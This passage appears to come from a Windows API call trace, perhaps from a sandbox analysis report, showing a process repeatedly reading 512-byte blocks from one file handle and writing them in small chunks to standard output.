0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.753] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.753] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.754] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.754] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.755] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.755] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.756] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.756] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.757] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.757] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.758] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.758] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.759] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.759] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] 